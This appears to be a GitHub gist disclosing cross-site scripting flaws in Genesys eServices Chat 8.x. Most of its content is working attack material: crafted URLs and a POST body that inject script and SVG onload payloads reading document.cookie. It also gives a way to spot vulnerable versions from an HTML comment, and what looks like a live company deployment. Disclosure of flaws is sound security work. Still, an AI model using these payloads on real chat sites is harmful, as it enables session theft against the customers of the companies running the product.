Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Hi for all,
My name is Luis Eduardo Jácome V.(a.k.a Mortal_Poison) and I find a vulnerability(gXSS and pXSS) in Genesys eServices Chat that affects the versions 8.x.x.
First of all, if you find Genesys eServices Chat with "<!-- Version 8.1.200.03 -->" in the HTML Source, is vulnerable:
A small PoC(for versions 8.1.x):
https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E
http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
The problem is that application not sanitize correctly the "values" of form(HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp).
The file changes with respect to the version of Genesys eServices Chat. However, in any of the versions, the form is not validated.
For versions with HTML Source "<!-- Version 8.1.000.07 -->", you can execute the next payload:
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
If the request is made by POST method, you should see something like the following (may vary, depending on the fields of the form):
cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300
In the part of %Inject_Here% you have to inject the malicious payload as for example: </Script/><Script/>(confirm)(1)</Script/>
You must insert it without the "%".
Remember that you must capture it with an application that intercepts requests, in my case, BurpSuite.
The product is used by many companies, however, not all are indexed by search engines.
https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF
Contact:
Twitter: @Mortal_Poison_
Youtube: https://youtube.com/XecureLabs
Web Page: https://xecure-labs.com
Affected versions:
Genesys eServices Chat 8.x.x
Tested on:
Firefox 50.0 and 60.0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.